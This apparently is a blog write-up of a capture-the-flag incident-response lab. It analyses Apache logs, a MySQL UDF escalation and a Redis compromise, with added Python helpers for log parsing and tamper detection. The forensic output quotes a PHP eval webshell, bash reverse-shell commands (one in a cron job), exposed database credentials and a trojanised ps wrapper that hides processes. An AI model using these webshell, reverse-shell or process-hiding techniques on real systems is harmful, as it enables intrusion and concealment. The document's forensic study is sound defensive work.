Xuanji Incident Response - Chapter 2

Posted by bamuwe on 2024-06-08

Log analysis - Apache log analysis

1. Submit the IP with the most requests that day, i.e. the attacker's IP:

$ cat access.log.1|awk -F ' ' '{print $1}'|sort|uniq -c
      1
     29 ::1
   6555 192.168.200.2
      1 192.168.200.211
      5 192.168.200.38
      1 192.168.200.48

flag{192.168.200.2}

2. What browser fingerprint did the attacker use? Submit the MD5 of the fingerprint:

$ cat access.log.1|grep -w '192.168.200.2'|awk -F '" ' '{print $3}'|uniq -c
     12 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
   6543 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"

The User-Agent seen on 6543 of the attacker's requests is the fingerprint; the flag is its MD5.

flag{2D6330F380F44AC20F3A02EED0958F66}

3. Check how many times index.php was accessed; submit the count:

$ cat access.log.1|grep '/index\.php'|wc -l
27

flag{27}

4. Check how many requests the attacker's IP made; submit the count:

$ cat access.log.1|grep -w '192.168.200.2'|wc -l
6555

flag{6555}

5. Check how many distinct IPs accessed the server during the hour starting 08:00 on 3 August 2023; submit the count:

$ cat access.log.1|grep '03/Aug/2023:08:'|awk '{print $1}'|sort|uniq|wc -l
5

flag{5}
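
The five Apache questions above are all the same operation, grouping and counting fields of a combined-format access log, so one small parser answers all of them and can be rerun unchanged on the next log. The script below is an added example for this write-up, not code from the original post or the challenge; the lines in SAMPLE_LOG are constructed, and the function names are mine.

```python
import hashlib
import re
from collections import Counter
from datetime import datetime

# Constructed sample lines in Apache "combined" format (not the challenge's
# access.log.1): two clients with different user agents, one off-hour visitor.
SAMPLE_LOG = """\
192.168.200.2 - - [03/Aug/2023:08:12:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
192.168.200.2 - - [03/Aug/2023:08:12:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
192.168.200.2 - - [03/Aug/2023:08:12:03 +0000] "GET /admin.php HTTP/1.1" 404 200 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
192.168.200.38 - - [03/Aug/2023:08:40:10 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.48 - - [03/Aug/2023:09:01:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
"""

# One combined-format line: ip ident user [timestamp] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(e)
    return entries


def top_ip(entries):
    """Question 1: (ip, count) for the client with the most requests."""
    return Counter(e["ip"] for e in entries).most_common(1)[0]


def ua_fingerprint(entries, ip):
    """Question 2: the most frequent User-Agent of one client and its uppercase MD5.
    The digest is taken over the bare string, without the surrounding quotes."""
    ua, _ = Counter(e["ua"] for e in entries if e["ip"] == ip).most_common(1)[0]
    return ua, hashlib.md5(ua.encode()).hexdigest().upper()


def count_path(entries, path):
    """Question 3: requests whose path equals `path`; the query string is ignored,
    matching what grep '/index\\.php' counts."""
    n = 0
    for e in entries:
        parts = e["request"].split()
        if len(parts) >= 2 and parts[1].split("?", 1)[0] == path:
            n += 1
    return n


def count_ip(entries, ip):
    """Question 4: number of requests from a single client."""
    return sum(1 for e in entries if e["ip"] == ip)


def distinct_ips_in_hour(entries, day, hour):
    """Question 5: distinct clients seen in one clock hour; `day` is YYYY-MM-DD."""
    return {e["ip"] for e in entries
            if e["time"].strftime("%Y-%m-%d") == day and e["time"].hour == hour}


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    ip, hits = top_ip(log)
    print("top client:", ip, hits)
    print("fingerprint:", ua_fingerprint(log, ip))
    print("index.php hits:", count_path(log, "/index.php"))
    print("clients at 08h:", distinct_ips_in_hour(log, "2023-08-03", 8))
```

One caveat the one-liners hide: uniq -c only collapses adjacent lines, so without a sort in front of it a User-Agent that alternates with another is counted several times. Counter groups by value regardless of order.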

Log analysis - MySQL incident response

1. The flag in the first shell the attacker wrote

$ cat /var/www/html/sh.php
<?php @eval($_POST['a']);?>
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

2. The flag for the IP of the attacker's reverse shell

$ cat /tmp/1.sh
bash -i >&/dev/tcp/192.168.100.13/777 0>&1

flag{}

3. The MD5 of the full path of the file used for privilege escalation, as flag{md5}; note: the path has the form /xxx/xxx/xxx/xxx/xxx.xx

The attacker used UDF privilege escalation. UDF escalation needs two conditions: 1. the attacker can connect to MySQL; 2. MySQL's secure_file_priv is empty, i.e. the server is allowed to write files to any path.

The database credentials are in the web application's config file:

root@xuanji:/var/www/html# cat common.php
<?php
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
if(!$conn){
echo "資料庫連線失敗";
}

Check the relevant MySQL settings:

MariaDB [cms]> show global variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
2 rows in set (0.00 sec)

MariaDB [cms]> show variables like '%plugin%';
+-----------------+------------------------+
| Variable_name   | Value                  |
+-----------------+------------------------+
| plugin_dir      | /usr/lib/mysql/plugin/ |
| plugin_maturity | unknown                |
+-----------------+------------------------+
2 rows in set (0.00 sec)

secure_file_priv is empty, so UDF privilege escalation was possible. UDF escalation leaves its shared object in plugin_dir, /usr/lib/mysql/plugin, where udf.so is present:

$ cat /usr/lib/mysql/plugin/udf.so

The flag is the MD5 of this path.

flag{b1818bde4e310f3d23f1005185b973e7}

4. The flag for the privileges the attacker obtained

$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.4  52172 16788 ?        Ss   04:17   0:00 /usr/bin/python /usr/bin/supervisord -n
root           8  0.0  0.0  18196  3224 ?        S    04:17   0:00 /bin/bash /usr/bin/mysqld_safe
root           9  0.0  0.1  61396  5400 ?        S    04:17   0:00 /usr/sbin/sshd -D
mysql        363  0.0  1.6 619976 64600 ?        Sl   04:17   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=m
root         385  0.0  0.6 313056 24688 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     387  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     388  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     389  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     390  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
www-data     391  0.0  0.1 313080  7788 ?        S    04:17   0:00 /usr/sbin/apache2 -DFOREGROUND
root         393  0.0  0.1  92560  6156 ?        Rs   04:17   0:00 sshd: root@pts/0
root         404  0.0  0.0  18204  3400 pts/0    Ss   04:17   0:00 -bash
root         469  0.0  0.0  15584  2116 pts/0    R+   04:32   0:00 ps aux

mysqld runs as the mysql user (PID 363), so anything executed through the UDF runs with mysql's privileges.

flag{mysql}

Log analysis - Redis incident response

1. SSH from the local PC to the server and work out which IP the attacker's successful attack came from; submit the attacker's IP as the FLAG;

$ cat redis.log|grep 'Connecting'|awk -F ' ' '{print $10}'|sort|uniq -c
     48 192.168.100.13:8888
      2 192.168.100.20:8888
      1 192.168.31.55:8888

Check each master address the replica connected to, one at a time:

$ cat redis.log|grep -w '192.168.100.20:8888' -C 3
419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...
--
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so

The line "Master replied to PING, replication can continue..." shows that master-replica replication with 192.168.100.20 succeeded.

flag{192.168.100.20}

2. SSH from the local PC to the server and analyse the first malicious file the attacker uploaded; submit the FLAG inside that malicious file;

$ cat redis.log|grep -w '192.168.100.20:8888' -C 3
...
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so

A module named exp.so was loaded. Locate the file on disk:

$ find / -name 'exp.so' 2>/dev/null
/exp.so

$ strings /exp.so | grep 'flag'
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
_flags2
_flags

flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
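
Both Redis questions turn on reading the replication log in order: which REPLICAOF was requested and by whom, which master connection actually completed the handshake, and which module was loaded afterwards. The following is an added example, not code from the write-up; it parses the excerpt quoted above (with grep's "--" separator removed) and attributes each handshake or module line to the master the replica was connected to at that moment. The function names are mine.

```python
import re

# Excerpt of the challenge's redis.log as quoted in the write-up. Each line is
# "<pid>:<role> <day> <month> <year> <time> <level-char> <message>".
REDIS_LOG = """\
419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
"""

# REPLICAOF/SLAVEOF accepted from a client: which master was set, which client asked.
REPLICAOF_RE = re.compile(
    r"REPLICAOF (?P<master>\S+) enabled \(user request from 'id=\d+ addr=(?P<client>\S+)")
CONNECT_RE = re.compile(r"Connecting to MASTER (?P<master>\S+)")
MODULE_RE = re.compile(r"Module '(?P<name>[^']+)' loaded from (?P<path>\S+)")
# Redis logs this once the replica has a working handshake with the master.
PING_OK = "Master replied to PING, replication can continue"


def replicaof_requests(log):
    """(master address, requesting client) for every REPLICAOF the server accepted."""
    return [(m.group("master"), m.group("client"))
            for m in (REPLICAOF_RE.search(line) for line in log.splitlines()) if m]


def master_outcomes(log):
    """Per master address: connection attempts, whether the handshake completed,
    and modules loaded while that master was the current one."""
    outcomes = {}
    current = None
    for line in log.splitlines():
        m = CONNECT_RE.search(line)
        if m:
            current = m.group("master")
            o = outcomes.setdefault(current, {"attempts": 0, "handshake_ok": False, "modules": []})
            o["attempts"] += 1
            continue
        if current is None:
            continue  # nothing to attribute before the first connection attempt
        if PING_OK in line:
            outcomes[current]["handshake_ok"] = True
        m = MODULE_RE.search(line)
        if m:
            outcomes[current]["modules"].append(m.group("path"))
    return outcomes


def successful_masters(log):
    """Hosts (port stripped) whose replication handshake completed."""
    return [addr.rsplit(":", 1)[0]
            for addr, o in master_outcomes(log).items() if o["handshake_ok"]]


def loaded_modules(log):
    """(module name, path) for every module Redis reports loading."""
    return [(m.group("name"), m.group("path"))
            for m in (MODULE_RE.search(line) for line in log.splitlines()) if m]


if __name__ == "__main__":
    print("REPLICAOF requests:", replicaof_requests(REDIS_LOG))
    print("outcomes:", master_outcomes(REDIS_LOG))
    print("successful masters:", successful_masters(REDIS_LOG))
    print("modules loaded:", loaded_modules(REDIS_LOG))
```

Two things the per-master view makes explicit: the REPLICAOF commands themselves came from a third address (192.168.200.2), and a "Wrong signature trying to load DB" error followed by a module load means the payload the master sent was not an RDB snapshot at all.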

3. SSH from the local PC to the server and find the IP of the attacker's reverse shell; submit that IP as the FLAG;

$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
*/1 * * * *  /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h  dom mon dow   command

The added job runs every minute and connects an interactive shell back to 192.168.100.13 on port 7777.

flag{192.168.100.13}

4. SSH from the local PC to the server, trace the attacker's username, and find the key string in the tool the attacker used (flag{attacker-username-key-string}; note the key string has the form xxx-xxx-xxx). Submit the username and key string as the FLAG

$ cat ~/.ssh/authorized_keys
REDIS0009�      redis-ver5.0.1�
�edis-bits�@�ctime�tO�dused-mem�XU
 aof-preamble���xxsshB9

ssh-rsa <public key omitted> xj-test-user

�<#5M

The key's comment gives the username xj-test-user. The RDB header (REDIS0009) at the top of the file shows it was written by a Redis SAVE rather than by an administrator, the classic way an exposed Redis instance is used to plant an SSH key.

Searching GitHub for that username leads to the flag.

flag{xj-test-user-wow-you-find-flag}
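
An authorized_keys file should be plain text, so the RDB header and binary bytes seen above are themselves the indicator. This is an added example, not from the post: a check that recognises the Redis RDB magic, recovers whatever key lines survive (and their comments, which here carry the username) and counts lines of non-text data. SAMPLE_AUTHORIZED_KEYS is constructed to resemble the quoted file; its aux fields are illustrative and the key blob is a placeholder, not a real key.

```python
import re

# Constructed bytes modelled on the quoted authorized_keys: RDB magic, a few
# binary aux fields, the planted key line padded with newlines, trailing bytes.
SAMPLE_AUTHORIZED_KEYS = (
    b"REDIS0009\xfa\x09redis-ver\x055.0.1\xfa\x05ctime\xc2tO\xe9d"
    b"\xfa\x08used-mem\xc2XU\x0e\x00\xfa\x0caof-preamble\xc0\x00\xfe\x00\xfb\x01\x00\x00\x02xx\xc4\x7f"
    b"\n\n\nssh-rsa AAAAB3NzaC1yc2E-PLACEHOLDER-KEY xj-test-user\n\n\n"
    b"\xff\x9d<#5M\x12\xc9"
)

# key-type, base64 blob, optional comment (options-prefixed lines are not handled here)
KEY_LINE_RE = re.compile(rb"^(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) (\S+)(?: (.*))?$")


def analyse_authorized_keys(data):
    """Report RDB magic, parsable key lines and the number of lines holding non-text bytes."""
    report = {"rdb_header": False, "rdb_version": None, "keys": [], "binary_lines": 0}
    # RDB dumps start with "REDIS" followed by a four-digit format version.
    if data.startswith(b"REDIS") and data[5:9].isdigit():
        report["rdb_header"] = True
        report["rdb_version"] = int(data[5:9])
    for raw in data.split(b"\n"):
        m = KEY_LINE_RE.match(raw)
        if m:
            report["keys"].append({
                "type": m.group(1).decode(),
                "comment": (m.group(3) or b"").decode(errors="replace"),
            })
        elif raw.strip() and any(b > 0x7E or (b < 0x20 and b != 0x09) for b in raw):
            report["binary_lines"] += 1
    return report


def is_suspicious(report):
    """Anything other than key lines and comments in authorized_keys warrants a look."""
    return report["rdb_header"] or report["binary_lines"] > 0


if __name__ == "__main__":
    r = analyse_authorized_keys(SAMPLE_AUTHORIZED_KEYS)
    print(r, "suspicious" if is_suspicious(r) else "clean")
```

The same check applies to any file Redis can be made to write to with CONFIG SET dir / dbfilename: cron spool files and web roots are the other usual places to look.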

5. SSH from the local PC to the server and analyse the command the attacker tampered with; submit the key string inside the tampered command as the FLAG;

$ ls -lh /usr/bin|sort -nk 8
...
-rwxr-xr-x 1 root root    919K Nov 13  2022 grub-fstest
-rwxr-xr-x 1 root root     91K Oct  8  2022 rpcgen
-rwxr-xr-x 1 root root     96K Apr 15  2022 gzip
-rwxr-xr-x 1 root root    980K Nov 13  2022 grub-mkrescue
-rwxr-xr-x 2 root root    2.3K Apr 15  2022 gunzip
-rwxr-xr-x 2 root root    2.3K Apr 15  2022 uncompress
-rwxr-xr-x 2 root root    4.7M Oct 31  2022 python3.7
-rwxr-xr-x 2 root root    4.7M Oct 31  2022 python3.7m
lrwxrwxrwx 1 root root      20 Jul 31  2023 cc -> /etc/alternatives/cc
lrwxrwxrwx 1 root root      21 Jul 31  2023 c89 -> /etc/alternatives/c89
lrwxrwxrwx 1 root root      21 Jul 31  2023 c99 -> /etc/alternatives/c99
lrwxrwxrwx 1 root root      25 Jul 31  2023 aclocal -> /etc/alternatives/aclocal
lrwxrwxrwx 1 root root      26 Jul 31  2023 automake -> /etc/alternatives/automake
-rwxrwxrwx 1 root root     178 Jul 31  2023 ps
-rwxr-xr-x 1 root root     10M Jun 29  2023 ssm-session-logger
-rwxr-xr-x 1 root root    131K Jul 31  2023 ps_
-rwxr-xr-x 1 root root     14M Jun 29  2023 amazon-ssm-agent
-rwxr-xr-x 1 root root     18M Jun 29  2023 ssm-session-worker
-rwxr-xr-x 1 root root     19M Jun 29  2023 ssm-cli
-rwxr-xr-x 1 root root     22M Jun 29  2023 ssm-document-worker
-rwxr-xr-x 1 root root     23M Jun 29  2023 ssm-agent-worker

There are two entries, ps and ps_: ps is a 178-byte world-writable file dated Jul 31 2023, while the 131K real binary has been renamed to ps_. The tampered ps is a wrapper script:

$ cat ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
        echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196

flag{c195i2923381905517d818e313792d196}
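
Three properties made ps stand out in the listing above: it is world-writable, it is a shell script under a name that should be an ELF binary, and the real binary sits beside it as ps_. The check below is an added example, not part of the original write-up; it encodes those three tells so they can be run over /usr/bin and /bin in one pass. build_sample_bin_dir creates a constructed directory in a temporary location so the check can be exercised without touching a real system; the name list, header list and function names are mine.

```python
import os
import stat
import tempfile

# Binaries commonly replaced to hide processes, files or connections.
SYSTEM_BIN_NAMES = {"ps", "ls", "netstat", "ss", "top", "find", "lsof", "who", "last"}
# Script headers. The malformed "#/bin/bash" (no "!") is included because the
# tampered ps above used it and bash executes such a file regardless.
SCRIPT_HEADERS = (b"#!/bin/sh", b"#!/bin/bash", b"#/bin/sh", b"#/bin/bash", b"#!/usr/bin/env")


def inspect_bin_dir(path):
    """Return [(name, [reasons])] for regular files that look like tampered binaries."""
    findings = []
    names = set(os.listdir(path))
    for name in sorted(names):
        full = os.path.join(path, name)
        if os.path.islink(full) or not os.path.isfile(full):
            continue  # symlinks such as cc -> /etc/alternatives/cc are expected
        reasons = []
        if os.stat(full).st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        with open(full, "rb") as fh:
            head = fh.read(32)
        if name in SYSTEM_BIN_NAMES and head.startswith(SCRIPT_HEADERS):
            reasons.append("shell script where an ELF binary is expected")
        if name + "_" in names:
            reasons.append("sibling '%s_' present: original probably renamed" % name)
        if reasons:
            findings.append((name, reasons))
    return findings


def build_sample_bin_dir():
    """Constructed directory mimicking the listing above: a wrapper 'ps', the
    renamed real binary 'ps_', an untouched binary and an alternatives symlink."""
    d = tempfile.mkdtemp(prefix="fakebin-")

    def write(name, data, mode):
        p = os.path.join(d, name)
        with open(p, "wb") as fh:
            fh.write(data)
        os.chmod(p, mode)

    write("ps", b"#/bin/bash\nps_ \"$@\" | grep -v hidden\n", 0o777)   # constructed wrapper
    write("ps_", b"\x7fELF" + b"\x00" * 28, 0o755)                     # stand-in for the real ps
    write("gzip", b"\x7fELF" + b"\x00" * 28, 0o755)
    os.symlink("/etc/alternatives/cc", os.path.join(d, "cc"))
    return d


if __name__ == "__main__":
    sample = build_sample_bin_dir()
    for name, reasons in inspect_bin_dir(sample):
        print(name, "->", "; ".join(reasons))
```

On a real host, compare the hits against the package manager's view as well (dpkg -V or rpm -V report files whose hash no longer matches the package) and run the checks from a trusted ps_, since a tampered ps will not report the processes it was written to hide.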
